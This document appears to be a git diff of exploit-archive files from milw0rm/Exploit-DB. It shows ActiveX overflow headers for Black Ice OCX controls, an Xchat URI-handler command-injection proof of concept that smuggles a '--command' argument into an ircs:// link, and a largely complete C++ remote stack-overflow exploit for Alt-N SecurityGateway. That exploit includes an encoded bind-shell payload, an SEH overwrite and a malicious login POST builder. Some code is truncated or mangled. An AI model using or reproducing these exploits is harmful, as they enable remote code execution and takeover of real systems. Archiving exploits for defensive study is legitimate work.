+ Mark.: RegKey Safe for Script: True
+        RegKey Safe for Init: True
+        Implements IObjectSafety: False
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Windows XP Professional SP3 fully patched, with Internet Explorer 7
+ Windows 2k Professional SP4 fully patched, with Internet Explorer 6
+
+ In memory of rgod
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+# milw0rm.com [2008-06-05]
diff --git a/platforms/windows/remote/5747.html b/platforms/windows/remote/5747.html
index b4fb0e22a..1dcebed81 100755
--- a/platforms/windows/remote/5747.html
+++ b/platforms/windows/remote/5747.html
@@ -1,64 +1,64 @@
- Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow
- url: http://www.blackice.com
-
- File : BITiff.ocx
- Ver. : 10.9.3.0
- CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3}
-
- Mark.: RegKey Safe for Script: True
-        RegKey Safe for Init: True
-        Implements IObjectSafety: False
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Windows XP Professional SP3 fully patched, with Internet Explorer 7
-
- In memory of rgod
------------------------------------------------------------------------------
-
-
-
-
-
-
-# milw0rm.com [2008-06-05]
+ Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote Buffer Overflow
+ url: http://www.blackice.com
+
+ File : BITiff.ocx
+ Ver. : 10.9.3.0
+ CLSID: {2324B5B7-D3EF-464C-BB35-06EFF8F11EB3}
+
+ Mark.: RegKey Safe for Script: True
+        RegKey Safe for Init: True
+        Implements IObjectSafety: False
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Windows XP Professional SP3 fully patched, with Internet Explorer 7
+
+ In memory of rgod
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+# milw0rm.com [2008-06-05]
diff --git a/platforms/windows/remote/5750.html b/platforms/windows/remote/5750.html
index df94b814c..4598f2c06 100755
--- a/platforms/windows/remote/5750.html
+++ b/platforms/windows/remote/5750.html
@@ -1,48 +1,48 @@
------------------------------------------------------------------------------
- Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
- and Memory Corruption
- url: http://www.blackice.com
-
- File : BIDIB.ocx
- Ver. : 10.9.3.0
- CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
-
- Mark.: RegKey Safe for Script: True
-        RegKey Safe for Init: True
-        Implements IObjectSafety: False
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Windows XP Professional SP3 fully patched, with Internet Explorer 7
- Windows 2k Professional SP3 fully patched, with Internet Explorer 6
-
- In memory of rgod
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-06-05]
+-----------------------------------------------------------------------------
+ Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
+ and Memory Corruption
+ url: http://www.blackice.com
+
+ File : BIDIB.ocx
+ Ver. : 10.9.3.0
+ CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
+
+ Mark.: RegKey Safe for Script: True
+        RegKey Safe for Init: True
+        Implements IObjectSafety: False
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Windows XP Professional SP3 fully patched, with Internet Explorer 7
+ Windows 2k Professional SP3 fully patched, with Internet Explorer 6
+
+ In memory of rgod
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-06-05]
diff --git a/platforms/windows/remote/577.c b/platforms/windows/remote/577.c
index df9dc656d..e6f697532 100755
--- a/platforms/windows/remote/577.c
+++ b/platforms/windows/remote/577.c
@@ -127,6 +127,6 @@ cout<<"        ===YahooPOPS <= v1.6, SMTP Remote Buffer Overflow Exploit==="<    
-
-
-
-
-
-# milw0rm.com [2008-06-10]
+--------------------------------------------------------------------------
+ Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow
+ url: http://www.blackice.com
+
+ File : BiAnno.ocx
+ Ver. : 10.9.5.0
+ CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}
+
+ Mark.: RegKey Safe for Script: True
+        RegKey Safe for Init: True
+        Implements IObjectSafety: False
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Windows XP Professional SP3 fully patched, with Internet Explorer 7
+ Windows 2k Professional SP4 fully patched, with Internet Explorer 6
+
+ In memory of rgod
+--------------------------------------------------------------------------
+
+
+
+
+
+
+# milw0rm.com [2008-06-10]
diff --git a/platforms/windows/remote/5778.html b/platforms/windows/remote/5778.html
index e4fe9cd86..b80eb03c0 100755
--- a/platforms/windows/remote/5778.html
+++ b/platforms/windows/remote/5778.html
@@ -1,68 +1,68 @@
-------------------------------------------------------------------------------
- Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2)
- url: http://www.blackice.com
-
- File : BiAnno.ocx
- Ver. : 10.9.5.0
- CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}
-
- Mark.: RegKey Safe for Script: True
-        RegKey Safe for Init: True
-        Implements IObjectSafety: False
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- In memory of rgod
-------------------------------------------------------------------------------
-
-
-
-
-
-
-# milw0rm.com [2008-06-10]
+------------------------------------------------------------------------------
+ Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2)
+ url: http://www.blackice.com
+
+ File : BiAnno.ocx
+ Ver. : 10.9.5.0
+ CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}
+
+ Mark.: RegKey Safe for Script: True
+        RegKey Safe for Init: True
+        Implements IObjectSafety: False
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ In memory of rgod
+------------------------------------------------------------------------------
+
+
+
+
+
+
+# milw0rm.com [2008-06-10]
diff --git a/platforms/windows/remote/5793.html b/platforms/windows/remote/5793.html
index 20a565013..3caf3e883 100755
--- a/platforms/windows/remote/5793.html
+++ b/platforms/windows/remote/5793.html
@@ -1,71 +1,71 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-06-12]
+
+
+
+
+
+
+
+# milw0rm.com [2008-06-12]
diff --git a/platforms/windows/remote/5795.html b/platforms/windows/remote/5795.html
index 2b8aaabf0..608cce348 100755
--- a/platforms/windows/remote/5795.html
+++ b/platforms/windows/remote/5795.html
@@ -1,35 +1,35 @@
-##################################################################################################################
-#
-# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
-# Vendor : http://xchat.org/
-# Affected Os : Windows *
-# Risk : critical
-#
-# This bug is related to the URI Handler vulnerability but the approch is a bit different.
-# We don't use any % or  ../../../ as the others related bugs, just a single "
-# According to the registry , when the IRCS:// URI is called , the command launched is :
-# C:\Program Files\xchat\xchat.exe --existing --url="%1"
-#
-# The xchat --help option tells us :
-# " --command=COMMAND :Send a command to existing xchat "
-#
-# So we add a simple " at the end of the URL and we're in business ?
-# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
-#
-# Note: The victim needs to be connected to an irc server , and also need IE * .
-#
-#
-#
-# Greetz: French/Quebec community, http://spiritofhack.net/
-#
-# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
-#
-# Poc: this only launch the calc, sky is the limit passed this point.
-
-Welcome to my personal website
-
-
-
-
-
-# milw0rm.com [2008-06-13]
+##################################################################################################################
+#
+# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
+# Vendor : http://xchat.org/
+# Affected Os : Windows *
+# Risk : critical
+#
+# This bug is related to the URI Handler vulnerability but the approch is a bit different.
+# We don't use any % or  ../../../ as the others related bugs, just a single "
+# According to the registry , when the IRCS:// URI is called , the command launched is :
+# C:\Program Files\xchat\xchat.exe --existing --url="%1"
+#
+# The xchat --help option tells us :
+# " --command=COMMAND :Send a command to existing xchat "
+#
+# So we add a simple " at the end of the URL and we're in business ?
+# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
+#
+# Note: The victim needs to be connected to an irc server , and also need IE * .
+#
+#
+#
+# Greetz: French/Quebec community, http://spiritofhack.net/
+#
+# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
+#
+# Poc: this only launch the calc, sky is the limit passed this point.
+
+Welcome to my personal website
+
+
+
+
+
+# milw0rm.com [2008-06-13]
diff --git a/platforms/windows/remote/582.c b/platforms/windows/remote/582.c
index c750fcd3f..7720d40fc 100755
--- a/platforms/windows/remote/582.c
+++ b/platforms/windows/remote/582.c
@@ -110,6 +110,6 @@ void ver()
                  printf ("# dcrab@hackerscenter.com www.hackerscenter.com #\n");
                  printf ("# Credits to Behrang Fouladi for finding this bug #\n");
                  printf ("################################################################\n");
-}
-
-// milw0rm.com [2004-10-18]
+}
+
+// milw0rm.com [2004-10-18]
diff --git a/platforms/windows/remote/5827.cpp b/platforms/windows/remote/5827.cpp
index c440ff18f..906739abd 100755
--- a/platforms/windows/remote/5827.cpp
+++ b/platforms/windows/remote/5827.cpp
@@ -1,612 +1,612 @@
-/* Dreatica-FXP crew
-* 
-* ----------------------------------------
-* Target         : Alt-N SecurityGateway v1.00-1.01 
-* ----------------------------------------
-* Exploit        : Alt-N SecurityGateway v1.00-1.01 Remote Stack Overflow Exploit
-* Exploit date   : 11.06.2008-14.06.2008
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS             : Windows ALL 
-* Crew           : Dreatica-FXP
-* ----------------------------------------
-* Details        : Obtain the overflow and crash the application is peace a cake job.
-*                  To make a wroking code execution here is a hell. First we can see that
-*                  the username before overflow the buffer pass through some functions, 
-*                  that changes and restrict some useful chars. Firstly the beffer gets 
-*                  lowered so the overflow should not contain upper chars  :( . So i decided 
-*                  to use some encoders for the payload like nonupper and non alpha from MSF.
-*                  The nonupper use the `@` (0x40) char which the app doesn't eat at all.
-*                  The nonalpha encoder in decoder code and the generated body contained 
-*                  always the 0xC0, 0xC1, 0x80, 0x81 which were translated to 0xE0, 0xE1, 
-*                  0x90, 0x91. Don't know, may be this chars translation was due to my russian locale.
-*                  After few days of work i have comed with the required bindshell which bypass
-*                  all restricted chars and executes. Thx to skylined, for his alpha tool. 
-* Bad chars      : 0x00 0x40 0x41 0x42 0x43 0x44 0x45 0x46 0x47 0x48 0x49 0x4A 0x4B 0x4C 0x4D 0x4E
-*                  0x4F 0x50 0x51 0x52 0x53 0x54 0x55 0x56 0x57 0x58 0x59 0x5A 0x40 0x7b 0xAA 0xC0
-*                  0xC1 0xC2 0x80 0x81
-* ----------------------------------------
-* Thanks to:
-*       1. securfrog               (       )
-*       2. ALPHA 2: Zero-tolerance (  ) 
-*       3. The Metasploit project  ( http://metasploit.com           ) 
-*       4. Dreatica-FXP crew       ( http://www.dreatica-fxp.com     )
-************************************************************************************
-* This was written for educational purpose only. Use it at your own risk. Author will be not be 
-* responsible for any damage, caused by that code.
-*/
-
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void print_info_banner_line(const char * key, const char * val);
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str);
-int  fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
-
-int hr2_connect(char * remotehost, int port, int timeout);
-int hr2_udpconnect(char * remotehost, int port,  struct sockaddr_in * addr, int timeout);
-int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
-int execute(struct _buf * abuf, char * remotehost, int port);
-
-struct _buf 
-{
-	unsigned char * ptr;
-	unsigned int size;
-};
-int construct_shellcode(int sh, struct _buf * shf, int target);
-int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
-
-
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char	*optarg;		// global argument pointer
-int		optind = 0, opterr; 	// global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-struct {
-	const char * name;
-	int length;
-	char *shellcode;	
-}shellcodes[]={ 	
-	 {"Bindshell, port 9998", 743, 
-		/* The non-encoded metasploit payload
-		* windows/shell_bind_tcp - 317 bytes
-		* http://www.metasploit.com
-		* Encoder: generic/none
-		*/
-		/*
-		* Encoder: heretic2's nonupper. with help of skylined tool.
-		*/
-		"\x6a\x20\x5b\x93\xf7\xe0\x91\xe8\xff\xff\xff\xff\x30\x5e\x5e\x66"
-		"\x8b\x7e\x22\x97\x3c\x60\x7c\x07\x2c\x20\x66\x93\x88\x5e\x22\x83"
-		"\xee\xff\xe2\xeb\xe8\xff\xff\xff\xff\x36\x5b\x5b\x93\x91\x83\xe9"
-		"\xf8\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x71\x7a\x76\x74"
-		"\x78\x33\x30\x76\x78\x34\x61\x70\x30\x61\x33\x68\x68\x30\x61\x30"
-		"\x30\x61\x62\x61\x61\x62\x74\x61\x61\x71\x32\x61\x62\x32\x62\x62"
-		"\x30\x62\x62\x78\x70\x38\x61\x63\x6a\x6a\x69\x6b\x6c\x32\x6a\x6a"
-		"\x6b\x70\x6d\x6a\x68\x7a\x79\x6b\x6f\x6b\x6f\x6b\x6f\x33\x70\x6c"
-		"\x6b\x72\x6c\x36\x64\x71\x34\x6c\x6b\x71\x75\x77\x6c\x6c\x6b\x73"
-		"\x6c\x73\x35\x33\x68\x35\x71\x7a\x6f\x6c\x6b\x70\x6f\x35\x68\x6c"
-		"\x6b\x71\x6f\x67\x70\x75\x71\x6a\x6b\x77\x39\x6c\x6b\x77\x64\x6c"
-		"\x6b\x75\x71\x7a\x6e\x76\x71\x69\x70\x6d\x69\x6e\x6c\x6b\x34\x69"
-		"\x70\x72\x74\x63\x37\x6f\x31\x38\x6a\x74\x6d\x35\x71\x79\x72\x6a"
-		"\x6b\x6b\x64\x77\x6b\x71\x64\x67\x74\x67\x78\x32\x75\x6d\x35\x6c"
-		"\x6b\x71\x6f\x77\x74\x35\x71\x6a\x6b\x32\x66\x6c\x6b\x74\x6c\x70"
-		"\x6b\x6c\x6b\x71\x6f\x35\x6c\x75\x71\x6a\x6b\x75\x73\x66\x6c\x6c"
-		"\x6b\x6b\x39\x62\x6c\x76\x64\x75\x6c\x33\x71\x6f\x33\x66\x71\x79"
-		"\x6b\x75\x34\x6c\x6b\x71\x73\x36\x70\x6c\x6b\x71\x70\x74\x6c\x6c"
-		"\x6b\x72\x70\x75\x6c\x6e\x6d\x6c\x6b\x71\x70\x35\x78\x71\x6e\x73"
-		"\x78\x6c\x6e\x70\x6e\x64\x6e\x7a\x6c\x30\x70\x6b\x6f\x78\x76\x35"
-		"\x36\x76\x33\x32\x66\x33\x78\x70\x33\x77\x62\x72\x68\x72\x77\x34"
-		"\x33\x76\x72\x71\x6f\x70\x74\x6b\x6f\x78\x70\x62\x68\x38\x6b\x6a"
-		"\x6d\x6b\x6c\x77\x6b\x66\x30\x6b\x6f\x78\x76\x71\x6f\x6b\x39\x6a"
-		"\x65\x73\x76\x6d\x71\x7a\x6d\x73\x38\x64\x62\x70\x75\x62\x6a\x35"
-		"\x72\x6b\x6f\x6e\x30\x72\x68\x78\x79\x75\x79\x6b\x65\x6e\x6d\x66"
-		"\x37\x6b\x6f\x79\x66\x36\x33\x70\x73\x71\x63\x71\x63\x70\x73\x71"
-		"\x73\x71\x63\x31\x73\x36\x33\x6b\x6f\x68\x70\x32\x66\x65\x38\x71"
-		"\x37\x74\x6e\x72\x66\x71\x63\x6b\x39\x6b\x71\x6c\x75\x73\x78\x6f"
-		"\x74\x75\x6a\x74\x30\x6f\x37\x30\x77\x6b\x6f\x79\x66\x32\x6a\x64"
-		"\x70\x36\x31\x31\x65\x6b\x6f\x6e\x30\x75\x38\x6e\x64\x6e\x6d\x76"
-		"\x6e\x6b\x79\x71\x67\x6b\x6f\x78\x76\x70\x73\x70\x75\x6b\x6f\x78"
-		"\x70\x65\x38\x6b\x75\x31\x79\x6c\x66\x70\x69\x30\x77\x6b\x6f\x6e"
-		"\x36\x70\x70\x31\x64\x71\x64\x76\x35\x6b\x6f\x78\x70\x6c\x73\x72"
-		"\x68\x6d\x37\x63\x69\x39\x76\x32\x79\x71\x67\x6b\x6f\x6e\x36\x71"
-		"\x65\x6b\x6f\x78\x70\x73\x76\x73\x7a\x35\x34\x32\x66\x72\x68\x75"
-		"\x33\x72\x6d\x6d\x79\x6b\x75\x72\x6a\x76\x30\x76\x39\x71\x39\x68"
-		"\x6c\x6b\x39\x6d\x37\x72\x6a\x30\x64\x6b\x39\x6b\x72\x76\x71\x6f"
-		"\x30\x7a\x73\x6e\x6a\x6b\x6e\x70\x62\x76\x6d\x6b\x6e\x67\x32\x36"
-		"\x6c\x6a\x33\x6c\x6d\x33\x6a\x76\x78\x6e\x6b\x6e\x6b\x6e\x6b\x63"
-		"\x78\x73\x62\x6b\x6e\x6e\x73\x74\x76\x6b\x6f\x62\x75\x70\x64\x6b"
-		"\x6f\x38\x76\x71\x6b\x76\x37\x76\x32\x30\x71\x30\x71\x70\x71\x72"
-		"\x6a\x65\x71\x30\x71\x30\x71\x30\x75\x70\x71\x6b\x6f\x78\x70\x75"
-		"\x38\x6e\x6d\x6e\x39\x74\x65\x78\x6e\x70\x73\x6b\x6f\x6e\x36\x73"
-		"\x7a\x6b\x6f\x6b\x6f\x36\x77\x6b\x6f\x6e\x30\x6c\x6b\x36\x37\x6b"
-		"\x6c\x6b\x33\x69\x74\x75\x34\x6b\x6f\x38\x76\x66\x32\x6b\x6f\x38"
-		"\x70\x33\x78\x7a\x70\x6c\x6a\x63\x34\x71\x6f\x66\x33\x6b\x6f\x6e"
-		"\x36\x6b\x6f\x68\x70\x61\x61"
-	 },	  
-	{NULL, 0, NULL}
-};
- 
-
-
- 
-struct _target{
-	const char *t ;
-	unsigned long ret ;
-} targets[]=
-{	
-	{"Alt-N SecurityGateway 1.00/1.01 universal", 0x67672190 }, // nonupper pop/pop/ret
-	{"DOS/Crash/Debug/Test/Fun",                  0x61616161 },
-	{NULL,                                        0x00000000 }
-};
-
-// memory for buffers
-unsigned char payloadbuffer[10000], a_buffer[10000];
-long dwTimeout=5000;
-int timeout=5000;
-
-
-int main(int argc, char **argv)
-{
-	char c,*remotehost=NULL,temp1[100];
-	int sh,port=4000,itarget=0;
-	struct _buf  fshellcode, sbuffer;
-
-	logo();
-	if(argc<2)
-	{
-		usage(argv[0]);		
-		return -1;
-	}
-
-	WSADATA wsa;
-	WSAStartup(MAKEWORD(2,0), &wsa);
-	// set defaults
-	sh=0;	
-	// ------------	
-	
-	while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
-	{
-		switch (c)
-		{
-			case 'h':
-				if (strchr(optarg,':')==NULL)
-				{
-					remotehost=optarg;
-				}else 
-				{
-					sscanf(strchr(optarg,':')+1, "%d", &port);
-					remotehost=optarg;
-					*(strchr(remotehost,':'))='\0';
-				}
-				break; 				
-			case 't':
-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;						
-			case 'T':				
-				sscanf(optarg, "%ld", &dwTimeout);
-				break; 			
-			default:
-				usage(argv[0]);
-				WSACleanup();
-			return -1;
-		}		
-	}	
-
-	if(remotehost == NULL)
-	{
-		printf("   [-] Please enter remotehost\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	print_info_banner_line("Host", remotehost);
-	sprintf(temp1, "%d", port);
-	print_info_banner_line("Port", temp1);
-	print_info_banner_line("Payload", shellcodes[sh].name);
-	sprintf(temp1, "%d", 9998);
-	print_info_banner_line("BINDPort", temp1);
-	
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-
-
-	memset(payloadbuffer, 0, sizeof(payloadbuffer));
-	fshellcode.ptr=payloadbuffer;
-	fshellcode.size=0;	
-
-	memset(a_buffer, 0, sizeof(a_buffer));
-	sbuffer.ptr=a_buffer;
-	sbuffer.size=0;
-
-	if(!construct_shellcode(sh, &fshellcode, itarget))
-	{
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-
-	printf("   [+] Payload constructed\n");
-	
-	if(!construct_buffer(&fshellcode, itarget, &sbuffer))
-	{
-		printf("   [-] Buffer not constructed\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Final buffer constructed\n");
-	
-
-	if(!execute(&sbuffer, remotehost, port))
-	{
-		printf("   [-] Buffer not sent\n");
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-	printf("   [+] Buffer sent\n");
-	
-	end_logo();
-	WSACleanup();
-	return 0;
-}
-
-int construct_shellcode(int sh, struct _buf * shf, int target)
-{
-	memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
-	shf->size=shellcodes[sh].length;
-
-	return 1;
-}
-
-
-
-char templ1[] =  "POST /SecurityGateway.dll HTTP/1.0\r\n"
-"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n"
-"Accept-Language: ru\r\n"
-"Content-Type: application/x-www-form-urlencoded\r\n"
-"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
-"Content-Length: %d\r\n\r\n";
-char templ2[]="RequestedPage=login&username=%s&passwd=world&lang=en&logon=Sign+In";
-
-int encode_uri(char * in, int len, char * out, int *outlen)
-{
-	char *out2=out;
-	int i;
-	memset(out,0,*outlen);
-	for(i=0;iptr;
-
-	memset(buf,0,sizeof(buf));
-	memset(buf2,0,sizeof(buf2));
-	memset(rstr1,0,sizeof(rstr1));
-	memset(rstr2,0,sizeof(rstr2));
-
-	lp=buf;	
-
-		// overflow
-	memset(lp,'\x61',476);
-	lp+=476;	
-
-		// jmp over seh
-	*lp++='\x90';
-	*lp++='\x90';
-	*lp++='\xeb';
-	*lp++='\x04';
-
-		// replace SEH
-	*lp++ = (char)((targets[target].ret      ) & 0xff);
-	*lp++ = (char)((targets[target].ret >>  8) & 0xff);
-	*lp++ = (char)((targets[target].ret >> 16) & 0xff);
-	*lp++ = (char)((targets[target].ret >> 24) & 0xff);
-
-	memset(lp,'\x90',1500);
-	lp+=5;
-
-	memcpy(lp, shf->ptr, shf->size);
-	lp+=shf->size;
-
-
-	olen = 1500;
-	encode_uri(buf, (int)strlen(buf), buf2, &olen);
-	sprintf(rstr2,templ2,buf2);
-	sprintf(rstr1,templ1,strlen(rstr2));
-
-	strcat((char*)cp,rstr1);
-	strcat((char*)cp,rstr2);
-
-	cp+=strlen((char*)cp);
-	abuf->size=(int)(cp-abuf->ptr);
-	return 1;
-}
-
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str)
-{
-	if (strchr(str,':')==NULL)
-	{
-		remotehost=str;
-	}else 
-	{
-		sscanf(strchr(str,':')+1, "%d", port);
-		remotehost=str;
-		*(strchr(remotehost,':'))='\0';
-	}
-}
-
-
-
-int hr2_connect(char * remotehost, int port, int timeout)
-{
-	SOCKET s;
-	struct hostent *host;
-	struct sockaddr_in addr;
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set x;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-		stTime.tv_sec = timeout / 1000;
-		stTime.tv_usec = timeout % 1000;
-		pstTime = &stTime;
-	}
-
-	host = gethostbyname(remotehost);
-	if (!host) return SOCKET_ERROR;
-
-	addr.sin_addr = *(struct in_addr*)host->h_addr;
-	addr.sin_port = htons(port);
-	addr.sin_family = AF_INET;
-
-	s = socket(AF_INET, SOCK_STREAM, 0);
-	if (s == SOCKET_ERROR)
-	{
-		closesocket(s);
-		return SOCKET_ERROR;
-	}
-
-	unsigned long l = 1;
-	ioctlsocket( s, FIONBIO, &l ) ;
-
-	connect(s, (struct sockaddr*)&addr, sizeof(addr));
-
-	FD_ZERO(&x);
-	FD_SET(s, &x);
-
-	res = select(NULL,NULL,&x,NULL,pstTime);
-	if(res< 0) return SOCKET_ERROR;
-	if(res==0) return 0;
-	return (int)s;
-}
-
-
-int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	return send(s, (char *)buf, len, 0);
-}
-
-int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
-	TIMEVAL stTime;
-	TIMEVAL *pstTime = NULL;
-	fd_set xy;
-	int res;
-
-	if (INFINITE != timeout) 
-	{
-		stTime.tv_sec = timeout / 1000;
-		stTime.tv_usec = timeout % 1000;
-		pstTime = &stTime;
-	}
-	FD_ZERO(&xy);
-	FD_SET(s, &xy);
-	
-	res = select(NULL,&xy,NULL,NULL,pstTime);
-
-	if(res==0) return 0;
-	if(res<0) return -1;
-
-	return recv(s, (char *)buf, len, 0);
-}
-
-int execute(struct _buf * abuf, char * remotehost, int port)
-{
-	int x;
-	SOCKET s ;
-	char RECVB[10000];
-
-	s = hr2_connect(remotehost, port, 10000);
-	if(s==0)
-	{
-		printf("   [-] connect() timeout\n");
-		return 0;
-	}
-	if(s==SOCKET_ERROR)
-	{
-		printf("   [-] Connection failed\n");
-		return 0;
-	}		
-	x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
-	printf("   [+] Sent %d out of %d bytes\n", x, abuf->size);
-
-	x = hr2_tcprecv(s, (unsigned char *)RECVB, 1000, 0);
-	
-	closesocket(s);
-	return 1;
-}
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-void print_info_banner_line(const char * key, const char * val)
-{
-	char temp1[100], temp2[100];
-
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp1, '\x20' , 58 - strlen(val) -1);	
-
-	memset(temp2,0,sizeof(temp2));
-	memset(temp2, '\x20' , 8 - strlen(key));	
-	printf(" #  %s%s: %s%s# \n", key, temp2, val, temp1);	
-
-}
-
-
-
-void usage(char * s)
-{	
-	int j;
-	printf("\n");
-	printf("    Usage: %s -h  -t \n", s);
-	printf("   -------------------------------------------------------------------\n");
-	printf("    Arguments:\n");
-	printf("      -h ........ host to attack, default port: 4000\n");
-	printf("      -t ........ target to use\n");		
-	printf("      -T ........ socket timeout\n");
-	printf("\n");
-	printf("    Supported SecurityGateway versions:\n");
-	for(j=0; targets[j].t!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, targets[j].t);
-	}					
-	printf("\n");
-	printf("    Code execution:\n");
-	for(j=0; shellcodes[j].name!=0;j++)
-	{
-		printf("      %d. %s\n",j+1, shellcodes[j].name);
-	}		
-	end_logo();	
-}
-
-void logo()
-{
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : Alt-N SecurityGateway 1.00-1.01 Remote Overflow exploit  # \n");
-	printf(" #  Solution: Update to 1.02 version                                   # \n");
-	printf(" #  Author  : Heretic2 < heretic2x [at] gmail.com >                    # \n");
-	printf(" #  Version : 1.0                                                      # \n");
